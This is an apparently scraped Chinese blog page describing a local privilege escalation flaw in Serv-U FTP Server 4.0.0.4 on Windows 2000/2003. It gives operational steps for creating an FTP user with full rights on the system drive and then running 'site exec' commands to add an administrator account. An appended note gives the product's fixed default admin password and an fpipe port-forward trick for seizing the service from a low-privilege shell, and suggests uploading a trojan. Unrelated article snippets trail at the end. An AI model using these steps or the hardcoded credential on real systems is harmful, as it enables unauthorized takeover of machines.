Serv U FTP Server本地提公升許可權缺陷

2021-04-01 10:27:49 字數 2458 閱讀 8920

serv-u ftp server為rhinosoft出品的一款ftp server軟體,可執行在microsoft windows平台下。

servuadmin.exe是ftp server管理介面,由於servuadmin.exe對異常的不正確處理,導致在serv-u被

註冊為系統服務的情況下,本地普通使用者進行許可權提公升,得到超級使用者的許可權。遠端用普通使用者許可權,可

以通過3389登陸的也可以進行提公升。

測試方法:

測試環境:

microsoft windows 2000(sp4)+serv-u ftp server 4.0.0.4

microsoft windows server 2003, enterprise edition+serv-u ftp server 4.0.0.4

測試方法:

一、安裝serv-u

以普通使用者登陸,許可權不夠,不能安裝,重新以administrator登陸安裝serv-u(預設安裝,此時serv-u

的啟動方式為自動啟動,已經註冊為系統服務),安裝好之後,啟動serv-u,然後就登出administrator。

二、提公升許可權

用普通使用者登陸,進入serv-u ftp server的安裝目錄,執行servuadmin.exe,新建域,而且新增使用者,

新建使用者ftpuser,把主目錄設定為系統目錄c:,此時使用者ftpuser的許可權為r----l--i,將使用者許可權設定為

系統管理員,甚至更高階別的,或者將使用者對目錄的訪問許可權設定為讀寫刪除執行,跳出servuadmin.ini

不能寫入,servuadmin.exe同時以system許可權對servuadmin.ini進行改寫。這樣ftpuser通過ftp就具有了

對系統目錄的讀寫刪除執行的許可權。這樣就可以進行許可權提公升了,你可以傳個木馬上去,再執行,或者直

接新增系統使用者。

ftp>open ip    

connected to ip.

220 serv-u ftp server v4.0 for winsock ready...

user (ip:(none)): ftpuser  //輸入ftp使用者

331 user name okay, please send ***plete e-mail address as password.

password:password  //密碼

230 user logged in, proceed.

ftp> cd winnt   //進入win2k的winnt目錄,如果是winxp或者是win 2003就應該為windows目錄。

250 directory changed to /winnt

ftp>cd system32  //進入system32目錄

250 directory changed to /winnt/system32

ftp>quote site exec ***.exe user cc cc /add   //利用***命令新增使用者。

200 exec ***mand successful (tid=33).

ftp>quote site exec ***.exe localhost administrators cc /add  //提公升為超級使用者

漏洞分析

1、只能以administrator安裝serv-u,其配置檔案servudaemon.ini和servuadmin.ini。ntfs格式預設情

況普通使用者只具有讀和執行的許可權(預設情況下只有admin和system有寫許可權),無法通過對他們改寫來

提公升許可權。

2、當serv-u成為系統服務的時候,就具有了system的許可權,servuadmin.exe雖然進行了許可權驗證,但由

於對異常處理不正確,對servuadmin.ini進行了寫操作,從而導致了漏洞的產生。

感謝紫幻,沒有他那篇文章,我就不會打serv-u的主意。

宣告本本僅用來描述可能存在的安全問題,作者本人不為此安全公告提供任何保證或承諾。由於傳播、利用此

eyas注:

serv-u預設監聽127.0.0.1:43958,所以只有在本機才能連線這個管理埠。

serv-u預設管理賬號是localadministrator,預設密碼是"#l@$ak#.lk;0@p",這個密碼在同乙個

版本中是固定的,也許在不同的版本中也是固定的。

假如目標機器ip是192.168.0.1,假如你已經有了乙個目標機器的普通許可權的shell,那麼你

在目標機器上執行fpipe -v -l 12345 -r 43958 127.0.0.1,然後在你自己的機器,用"serv-u

admin"新建server,

192.168.0.1:12345

user:localadministrator

pass:"#l@$ak#.lk;0@p"

,那麼目標機器的serv-u就歸你管了。

(不需要能終端或物理控制台登入,只要有個shell,能執行埠資料**的程式就可以了)

Serv U FTP Server使用教程

啟動serv u adminisrator之後,出現如圖介面,先看看 本地伺服器 這個專案,如圖,有個選項是 自動開始 系統服務 選中後,serv u就把自己註冊成系統服務,開機自動執行,而且在使用者沒有登入的情況下就開始執行了。這裡說說serv u的執行方式,看看安裝後的根目錄,有幾個檔案 ser...

UILocalNotification本地通知

通知和應用是分別處理的,應用程式排程了通知之後,即便被關掉,仍然能夠在指定的排程時間被觸發。通常在使用本地通知時,是在應用程式退出到後台時來排程的。應用程式退出到後台之後,會在記憶體中駐留10分鐘的時間,過了10分鐘之後,系統會自動清理應用程式,1.通常本地通知是在退出應用程式時,被排程的,在後台往...

為什麼 100本本難以推行

100本本已經推出很久了,但是仍然只能在網路上看到她的身影,為什麼限制重始終看不見呢?她太漂亮了,設計那麼好,我想不要說 100,就是 翻一翻只要能夠買得到,csdn也會有大批追隨者。比較一下一款廉價的智慧型手機或是pda都要貴很多。所以,如果zf真的在某個山村發上一批,那js一旦得到訊息,馬上就會...